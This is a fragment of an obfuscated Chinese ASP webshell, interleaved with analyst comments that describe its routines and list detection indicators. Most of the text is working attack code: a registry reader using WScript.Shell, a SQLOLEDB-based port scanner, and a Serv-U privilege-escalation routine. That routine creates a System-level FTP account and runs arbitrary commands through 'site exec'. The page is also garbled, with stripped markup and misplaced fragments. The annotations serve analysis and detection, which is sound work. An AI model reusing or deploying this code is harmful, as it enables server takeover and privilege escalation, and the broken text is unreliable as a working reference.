\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}
" rRs "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}
" RRs "-----------OVER--------------------
" rRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}
" rRs "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}
" Rrs "" rrs "
" If reQuEST("thePath")<>"" thEn oN erroR ReSuME neXT set wsX = SErvEr.createObJEct("WScript.Shell") ThEPATH=requeSt("thePath") theaRray=wSX.RegrEaD(THepAtH) iF ISARray(tHEarrAY) ThEn foR i=0 to UboUnd(theArray) rrs "
  • " & thEaRrAy(I) nEXt ELse rrS "
  ' Analyst annotation (comments only; every code token below is exactly as found on the page).
  ' VBScript ignores letter case, so the scrambled casing does not change behaviour; it is presumably
  ' there to defeat case-sensitive signatures, so match this sample case-insensitively.
  ' The first line below finishes the preceding Sub and then opens Sub ScanPort().
  ' ScanPort sets Server.ScriptTimeout to 7776000 and reads the form fields "port", "ip" and "scan".
  ' With an empty "port" it assigns portList the fixed list 21,...,43958; with an empty "ip" it uses 127.0.0.1.
  ' When "scan" is non-empty, "port" and "ip" are split on commas. A port entry is either numeric or an
  ' "a-b" range; anything else prints "is not number". An ip entry containing "-" is expanded over its
  ' last octet. Every resulting (ip, port) pair is passed to Scan(), and the elapsed seconds are printed.
  ' NOTE(review): the port loop splits Request.Form("port") directly, so the default portList assigned
  ' above is not what gets iterated.
  ' NOTE(review): the start of an ip range is taken with Mid(..., 1), i.e. a single character of the octet.
  ' The bare text lines and empty rrs"" calls are HTML output strings whose markup was lost in extraction.
  ' Detection: form posts carrying port/ip/scan to an .asp page, an unusually large ScriptTimeout, and a
  ' web worker process making connection attempts across many ports are the observable side of this routine.
  • " & THEArrAY End IF END iF enD Sub sub ScanPORt() ServEr.SCripTtimeout = 7776000 If ReQuEST.foRm("port")="" tHEn pORTlISt="21,23,25,80,110,135,139,445,1433,3389,43958" eLse PortlISt=rEqUesT.fOrm("port") end iF iF reqUeST.fOrm("ip")="" tHen ip="127.0.0.1" ELSe Ip=rEqUEST.Form("ip") EnD If RRS"

    端口扫描器

    " Rrs"
    " rrS"

    Scan IP: " rRS" " rRs"
    Port List:" rrs"" rrs"

    " rRS"" rRS"" rrs"

    " if ReqUEst.Form("scan") <> "" THen timEr1 = tIMER RrS("扫描报告:

    ") TMp = SPLiT(rEqUeSt.foRm("port"),",") Ip = spLIT(rEQueSt.fORM("ip"),",") FOr Hu = 0 to ubounD(IP) If inSTR(Ip(HU),"-") = 0 thEn FOR I = 0 TO UBound(tmP) IF isNumERIC(TmP(I)) THen caLl ScaN(Ip(HU), TmP(I)) ElSe sEEkx = INstR(tmP(i), "-") IF SEEKx > 0 Then StarTn = leFT(TMp(i), sEeKX - 1 ) endN = RIghT(Tmp(i), LEn(tMp(i)) - seeKx ) if ISnUMERIc(starTn) ANd iSnUMerIc(EnDn) ThEN foR j = startn TO ENDn CalL ScAN(Ip(Hu), J) nEXt eLSE Rrs(staRTn & " or " & endn & " is not number
    ") END IF eLsE rrs(TMp(i) & " is not number
    ") enD If ENd IF NeXt elsE IpsTart = Mid(ip(hu),1,iNstrrev(ip(hU),".")) fOr xXx = MID(iP(HU),inSTRreV(Ip(Hu),".")+1,1) TO mID(ip(Hu),iNStR(IP(hu),"-")+1,lEn(iP(Hu))-iNsTr(IP(hu),"-")) fOr I = 0 to uBOund(TMP) if isnUMeric(tMp(i)) theN cALl sCaN(ipstART & XXX, tMp(I)) ELSe SeeKx = instR(TMp(I), "-") If seekx > 0 tHen STArtN = lefT(tMp(i), SEEkX - 1 ) ENdn = riGht(tMP(I), LeN(tMP(i)) - sEEkX ) iF isnumEriC(STARTN) AND isNUMeRIc(eNdn) THEN fOR J = STartn TO ENdN call SCaN(IpSTArT & xXx,J) nexT eLSE rrS(STarTn & " or " & endn & " is not number
    ") end if ELse rRS(tMP(i) & " is not number
    ") EnD IF eND If NExt NexT eNd IF NEXt TimER2 = timEr tHETIME=CsTr(INT(TimER2-TiMeR1)) rrs"
    ' Analyst annotation (comments only; every code token below is exactly as found on the page).
    ' The first line below prints ScanPort's elapsed time, closes that Sub, then opens Sub Scan(targetIP, portNum).
    ' Scan assembles the ProgID from fragments ("ADO" & "DB." & "con" & ...), so a plain string search for the
    ' full ProgID will not match this file; signatures need to tolerate split literals.
    ' It opens a SQLOLEDB.1 connection with Data Source = targetIP,portNum, User ID=lake2, an empty password
    ' and ConnectionTimeout = 1, under On Error Resume Next. When Err.Number is -2147217843 or -2147467259,
    ' an error description containing "(Connect())." is reported as closed, anything else as open.
    ' Detection: SQLOLEDB connection attempts from the web worker to hosts and ports that are not database
    ' servers, and the literal "User ID=lake2", are indicators taken directly from this sample.
    Process in "&tHetImE&" s" END IF enD SuB suB sCAN(TArGeTIP, poRtnuM) ON eRROr RESUme NEXT seT coNn = sErVer.crEATeObJECt("ADO" & "DB." & "con" & "nec" & "tio" & "n") cOnnstr="Provider=SQLOLEDB.1;Data Source=" & TarGetiP &","& PORTNUM &";User ID=lake2;Password=;" cONN.CoNNECTioNtIMEoUt = 1 conn.oPen cONNSTr If Err tHeN IF Err.NumBer = -2147217843 OR Err.nUmBer = -2147467259 then IF InsTR(eRr.dESCrIPTIoN, "(Connect()).") > 0 theN rrS(taRgeTip & ":" & poRTNuM & ".........关闭
    ") Else rRS(tArGetip & ":" & poRtnuM & ".........开放
    ' The next line closes Sub Scan, then starts the top-level dispatcher: Select Case action with the cases
    ' MainMenu, getTerminalInfo, PageAddToMdb, ScanPort, CreateMdb and Servu.
    ' Case "Servu" reads the request parameters SUaction (non-numeric ends the response), u, p, port, c and f.
    ' It builds Serv-U administration command strings: a login from u/p, SITE MAINTENANCE, -DELETEDOMAIN and
    ' -SETDOMAIN for a domain named "goldsun" on port 65500, and -SETUSERSETUP for a user "go" with
    ' Maintenance=System and access flags RWAMELCDP on the drive taken from f (or from gpAth() when f is empty).
    ' SUaction 1 and 3 send these strings with Microsoft.XMLHTTP to 127.0.0.1 on the supplied port
    ' (paths /goldsun/upadmin/s1 and /s3); SUaction 2 sends "site exec" plus the c parameter to port 65500
    ' (path /goldsun/upadmin/s2); any other value aborts the objects kept in Session("a"/"b"/"c") and prints the form.
    ' NOTE(review): case 3 creates C but then calls a.Open / a.Send and stores Session("a"); this looks like a
    ' copy-paste slip in the sample.
    ' NOTE(review): the flow only works if the local Serv-U administration listener accepts the u/p values
    ' supplied in the request; hardening that listener and its credentials is presumably the relevant
    ' control - confirm against the deployed Serv-U version.
    ' Detection: loopback HTTP requests from the web worker to /goldsun/upadmin/s1..s3, an FTP domain named
    ' "goldsun" on port 65500, and an FTP account "go" are indicators taken directly from this sample.
    ") END If ENd iF eNd If ENd sub SelEct cAsE acTioN Case "MainMenu":MainMenu() Case "getTerminalInfo":getTerminalInfo() Case "PageAddToMdb":PageAddToMdb() case "ScanPort":ScanPort() case "CreateMdb" Case "Servu" sUaCTioN=ReqUEsT("SUaction") IF Not isnUmErIC(SUACtiON) thEN ResPONsE.enD uSER = TRIm(rEQuEST("u")) PaSs = TRiM(REQUesT("p")) pOrt = tRiM(REqUEST("port")) cMd = TRiM(reqUEST("c")) F=TRIM(ReqUEsT("f")) iF f="" theN F=GpATH() ELSe f=LeFT(f,2) eNd if fTPPORT = 65500 tIMeout=3 lOGinUSer = "User " & usEr & vBcrlf lOgInPass = "Pass " & PasS & vbcrlF dEldOMaIn = "-DELETEDOMAIN" & VBcrlF & "-IP=0.0.0.0" & vBCrlf & " PortNo=" & fTPpORt & vbcRlF Mt = "SITE MAINTENANCE" & vbCrLF neWDOmain = "-SETDOMAIN" & VbCrlf & "-Domain=goldsun|0.0.0.0|" & ftPpoRt & "|-1|1|0" & vBCRLF & "-TZOEnable=0" & VbCrLF & " TZOKey=" & VbcrLF nEWusEr = "-SETUSERSETUP" & VBCrLF & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & FTpPoRT & vbcRlF & "-User=go" & VbCrlF & "-Password=od" & vbCrlF & _ "-HomeDir=c:\\" & VbCRLf & "-LoginMesFile=" & vBcRlf & "-Disable=0" & Vbcrlf & "-RelPaths=1" & VbCrlF & _ "-NeedSecure=0" & VbcrLf & "-HideHidden=0" & VbCrLf & "-AlwaysAllowLogin=0" & VbCrLf & "-ChangePassword=0" & vBCRlF & _ "-QuotaEnable=0" & VbCrlF & "-MaxUsersLoginPerIP=-1" & VbcRLF & "-SpeedLimitUp=0" & VbcrLf & "-SpeedLimitDown=0" & VbcrLF & _ "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrLF & "-SessionTimeOut=-1" & VbCRlf & "-Expire=0" & vbcrlF & "-RatioUp=1" & VBCrLf & _ "-RatioDown=1" & vBCRlF & "-RatiosCredit=0" & vbCRlF & "-QuotaCurrent=0" & vBCRLf & "-QuotaMaximum=0" & VbCRlf & _ "-Maintenance=System" & VBCRlF & "-PasswordType=Regular" & vbCrlf & "-Ratios=None" & vbCrLF & " Access=c:\\|RWAMELCDP" & VBCrlf quIT = "QUIT" & VbCrlf newUsER=rEPlacE(neWuser,"c:",f) SElEct CAsE SuaCtiOn cASE 1 seT a=sERVER.crEATeobJect("Microsoft.XMLHTTP") a.opEN "GET", "http://127.0.0.1:" & PORT & "/goldsun/upadmin/s1",True, "", "" A.Send LoginUSER & lOginpaSS & mT & dELDOMain & NEWdoMAIn & nEWusER & qUIt SEt 
SesSioN("a")=a RRS"
    " rrs"" rrs"" RrS"" rRS"" RrS"" rrs"
    " rrs"" caSe 2 set b=sERVEr.CREateoBjeCt("Microsoft.XMLHTTP") b.opeN "GET", "http://127.0.0.1:" & FTPPoRt & "/goldsun/upadmin/s2", TRue, "", "" B.SeND "User go" & VbcRLf & "pass od" & VbcRLF & "site exec " & CMd & VBCRLF & QUiT sEt SEsSion("b")=B rrs"
    " RrS"" RrS"" rrs"" rRS"" RRs"" RRs"
    " RRS"" CAsE 3 set C=sERVEr.CREateobJEct("Microsoft.XMLHTTP") a.OPen "GET", "http://127.0.0.1:" & PoRt & "/goldsun/upadmin/s3", tRue, "", "" A.sEnD LOGINuSer & LOgInPAss & MT & DeldOMAIN & QUIT set SEssiOn("a")=a rRs"
    提权完毕,已执行了命令:
    "&CMD&"

    " RRS"" rrS"
    " CaSe eLSe on ErROr RESumE neXt SET A=SeSSIOn("a") sEt b=SESSION("b") sET c=SEsSIOn("c") a.aBOrt SEt A = noThing B.aBORT sET b = NOtHInG c.aBORt sET c = NOThiNG RRs"
    " rRS"" RrS"" rrS"" RRs"" RRS"" rrs"" Rrs"" rrs"" rrS"" rrs"" rrS"" rRS"" RRS"" rRs"" rrs"" rrs"" rrs"" RrS"" rRs" " RrS" " RRs" " RRs" " rRs" " rrS" " rRS" " RRS" " RRS"
    Serv-U 提升权限 呆子修改版
    用户名:
    口 令:
    端 口:
    系统路径:
    命 令:
    " rrs"" Rrs"
    ' The next line closes the inner Select, then defines Function gpAth(): it returns the first two
    ' characters (lower-cased) of FileSystemObject.GetSpecialFolder(0), or "c:" when creating the object fails.
    ' After it, Case "kmuma" begins: a file-scanner front end. Unless the query string has act=scan it prints
    ' Server.MapPath("/") and Server.MapPath(".") followed by a search form.
    " ENd sElECT FunCtiOn gpAtH() ON erROR REsUMe next Err.CleaR Set f=sERver.cREateOBJECt("Scripting.FileSystemObject") if err.nUmBer>0 THeN gpATh="c:" eXIt fUncTioN eND IF GpaTH=F.gEtsPECialFoldER(0) GpAth=LcASe(leFT(GpatH,2)) SET F=NothInG END FUNcTIon caSe "kmuma" DIM rEpORT If REQUEst.quEryStriNg("act")<>"scan" tHen rRs ("网站根目录- "&sErveR.mAppATH("/")&"
    ") Rrs ("本程序目录- "&seRVER.MAPPaTH(".")) RrS "
    " rrS "

    填入你要检查的路径:" RrS " 填“\”网站根目录;“.”为本程序目录

    " rrS "你要干什么: 查ASP 马" Rrs "搜索符合条件之文件
    " RrS "

    " RRs "  查找内容:" RRS " 要查找的字符串,不填就只进行日期检查
    " rRS "  修改日期: 多个日期用;隔开,任意日期填写 ALL
    " rRS "  文件类型: 类型之间用,隔开,*表示所有类型

    " RRS "" rrs "
    ' Scan branch of "kmuma": the form field "path" is required ("\" and "." are resolved with Server.MapPath).
    ' radiobutton = "sws" sets DimFileExt to asp,cer,asa,cdx and calls ShowAllFile; otherwise Search_Date and
    ' Search_FileExt are required and ShowAllFile2 is called. Folder, file and hit counters and the elapsed
    ' time are printed at the end.
    ' NOTE(review): the InStr and RegExp checks that follow (Shell.Application ProgID/clsid, script .encode,
    ' Eval, Execute, (Open|Create)TextFile, SaveToFile, Save) read filetxt, which this branch never assigns;
    ' they are presumably fragments of the file-scanning Sub displaced when the page's HTML was stripped.
    ' NOTE(review): domybest is not assigned anywhere in view; if empty, the concatenations only split the
    ' literals, presumably so this file does not match the same patterns it searches for.
    " eLSe IF rEQUeSt.FORm("path")="" THen rrS("路径不能为空") REsPOnSe.end() eNd IF IF ReqUEsT.ForM("path")="\" TheN TmPPaTh = seRVER.MaPpaTH("\") eLSEIF reqUesT.FoRM("path")="." tHen TmpPath = sERveR.MAppATH(".") Else TMPPaTh = ReQUEST.FoRm("path") ENd if tIMER1 = TIMeR Sun = 0 sumfilEs = 0 SumFOLderS = 1 iF rEquesT.FORM("radiobutton") = "sws" THen DiMfiLEEXt = "asp,cer,asa,cdx" CAll ShowAllFiLe(TmpPAtH) eLse if REqueST.FOrM("path") = "" Or rEqUEsT.forM("Search_Date") = "" or rEqUeST.FOrM("Search_FileExt") = "" thEn rrs("缉捕条件不完全

    请返回重新输入") reSPONSE.End() ENd iF diMfILEExt = reQUeST.FOrM("Search_fileExt") CAlL ShowaLlFiLE2(TmppATH) EnD if rRS "" rrS "" Rrs "" SUn = sUN + 1 TEmP="-=| 同上 |=-" EnD IF IF INStr( FILetXt, lcAsE("She"&domYBEsT&"ll.Application") ) oR InSTr( FilETXt, lcAsE("clsid:13709620-C27"&doMyBEst&"9-11CE-A49E-444553540000") ) THEn RePoRT = REPoRT&"" SUN = SUn + 1 tEMP="-=| 同上 |=-" End if Set reGEX = new reGeXP rEGeX.IgNORecASE = true regeX.gloBAL = TrUE regex.pAtTerN = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b" If RegEx.tESt(FILeTxt) THen rePoRT = rEPoRT&"" SUN = sun + 1 TEMP="-=| 同上 |=-" ENd If Regex.PatTern = "\bEv"&"al\b" if ReGEx.TESt(fILETXt) THeN RepORT = rEpoRT&"" sun = SUn + 1 TEMP="-=| 同上 |=-" ENd IF REGex.PattErN = "[^.]\bExe"&"cute\b" If REGex.TesT(fiLetxT) ThEN RepOrt = RepoRT&"" sun = Sun + 1 temP="-=| 同上 |=-" enD iF rEGex.paTTern = "\.(Open|Create)TextFile\b" iF REgeX.TeSt(filETXt) then RePoRT = REpOrT&"" sUn = sUN + 1 temp="-=| 同上 |=-" end IF rEgEx.PATterN = "\.SaveToFile\b" IF rEGEx.tESt(fiLETXT) ThEn RePORt = rEporT&"" Sun = sun + 1 tEmP="-=| 同上 |=-" ENd if reGEx.PatTerN = "\.Save\b" if regEx.TEsT(fIlETxt) then REPORT = rePORt&"" SUn = sUN + 1 Temp="-=| 同上 |=-" eND IF sEt reGeX = NothIng sET ReGex = NEw reGexp regEx.IGNorEcASE = True REgeX.GloBal = tRUE ReGEx.PAtTErN = "
    Scan WebShell -- 呆子修改版
    " RRS "
    " rrs "扫描完毕!一共检查文件夹"&SumfoLDers&"个,文件"&SUMfiLes&"个,发现可疑点"&SuN&"个" rRS "" If REqUeSt.ForM("radiobutton") = "sws" thEN rrS "" rRS "" RRs "" RRs "" eLsE Rrs "" RRs "" rrs "" enD iF RRS "" rrS rEporT RRs "
    文件相对路径特征码描述创建/修改时间文件相对路径文件创建时间修改时间
    " timeR2 = tiMER thETIme=csTr(iNT(((TImEr2-TimEr1)*10000 )+0.5)/10) RrS "
    ' Analyst annotation (comments only; every code token below is exactly as found on the page).
    ' The line below prints the elapsed milliseconds, closes the enclosing If, then defines Sub ShowAllFile(path).
    ' ShowAllFile creates a Scripting.FileSystemObject and exits when the folder does not exist. For each file
    ' whose extension passes CheckExt (defined outside this view) it calls ScanFile and increments sumfiles;
    ' it then recurses into every subfolder, incrementing sumfolders.
    ' Sub ScanFile(filepath, infile) begins on the same line: it sets Server.ScriptTimeout to 999999999, opens
    ' the file with OpenTextFile under On Error Resume Next, reads it whole and lower-cases it before the
    ' pattern checks. Its body continues past this line.
    ' Detection: a web worker recursively opening and fully reading script files under the site root, together
    ' with a very large ScriptTimeout, is the observable side of this routine.
    本页执行共用了"&tHetIME&"毫秒" eND iF sUB ShOwaLLfIlE(paTh) set f1SO = cReAteobjecT("Scripting.FileSystemObject") IF noT f1SO.FOldERExISTs(path) TheN exiT sUb SET f = f1so.GeTFoLDEr(PaTh) set fc2 = f.fiLeS fOR eacH MYFIle In FC2 IF CHeCkexT(f1so.gEtEXTEnsiONNaMe(path&"\"&MyfIle.nAmE)) theN caLL sCANfILe(Path&TeMp&"\"&mYfILe.NAme, "") SuMfiLes = SumFiLeS + 1 eNd IF next sEt FC = f.SuBFOLderS for EAch F1 in fC shoWallFiLE PaTh&"\"&f1.nAmE sUMFoldeRs = sUmFoldeRs + 1 nEXT set f1SO = nOtHing EnD sub sUb ScAnFILe(fIlepAth, infILE) ServER.scrIptTIMEouT=999999999 IF INfIlE <> "" tHeN InFIleS = "该文件被"& InFiLE & "文件包含执行" EnD IF sEt fSo1s = cReAtEoBjEct("Scripting.FileSystemObject") on eRror rESuMe nexT seT oFIle = Fso1s.oPentExtfIle(FilePATh) FilEtXt = lcase(OFILe.READAll()) If err tHEn EXIT suB End if IF LeN(filETxT)>0 theN FiLETxt = vBCrlF & fILeTxT tEMp = ""&REPlacE(FILePatH,SeRveR.mAPpAtH("\")&"\","",1,1,1)&"
    " TeMp=TEmP&"编辑 " TeMP=TEmp&"删除 " TeMP=TemP&"复制 " TEMp=tEMP&"移动" if INsTr( fileTxT, lCasE("WScr"&doMYBest&"ipt.Shell") ) OR instr( Filetxt, LcasE("clsid:72C24DD5-D70A"&DomYBesT&"-438B-8A42-98424B88AFB8") ) THEn rePorT = RePOrt&"
    "&teMp&"WScr"&doMYBesT&"ipt.Shell 或者 clsid:72C24DD5-D70A"&dOmybeST&"-438B-8A42-98424B88AFB8危险组件,一般被ASP木马利用"&INFIlEs&""&GEtDatECrEAtE(fiLEPATH)&"
    "&GetdAtemoDiFY(fIlePAtH)&"
    "&TEMP&"She"&DOmyBEst&"ll.Application 或者 clsid:13709620-C27"&domybEsT&"9-11CE-A49E-444553540000危险组件,一般被ASP木马利用"&INFilES&""&gEtdaTECREATE(FilePaTH)&"
    "&gETDATEModIfy(fIlEpAth)&"
    "&TEmP&"(vbscript|jscript|javascript).Encode似乎脚本被加密了"&inFIlES&""&GETDatecreAtE(FilepAtH)&"
    "&GetDaTEModIFY(FIlEpatH)&"
    "&teMP&"Ev"&"ale"&"val()函数可以执行任意ASP代码
    但是javascript代码中也可以使用,有可能是误报。"&iNfILes&"
    "&getDateCreATe(fIlepatH)&"
    "&GeTDAtEMoDIfy(FilepATh)&"
    "&TemP&"Exec"&"utee"&"xecute()函数可以执行任意ASP代码
    "&iNfilES&"
    "&gEtDatEcReaTe(FiLEpaTh)&"
    "&GeTdAteMOdIfY(fiLepAtH)&"
    "&teMp&".CreateTextFile|.OpenTextFile使用了FSO的CreateTextFile|OpenTextFile读写文件"&INFiLEs&""&gETdateCreate(FiLEpAtH)&"
    "&GetdatEMODIFy(FIlepatH)&"
    "&tEmp&".SaveToFile使用了Stream的SaveToFile函数写文件"&iNfIlEs&""&geTDAtECREate(fiLePaTH)&"
    "&gEtdATEmodIfY(filepath)&"
    "&tEMp&".Save使用了XMLHTTP的Save函数写文件"&InfILES&""&geTdateCReatE(FILepAth)&"
    "&gETDAteMoDiFy(FIlEpAth)&"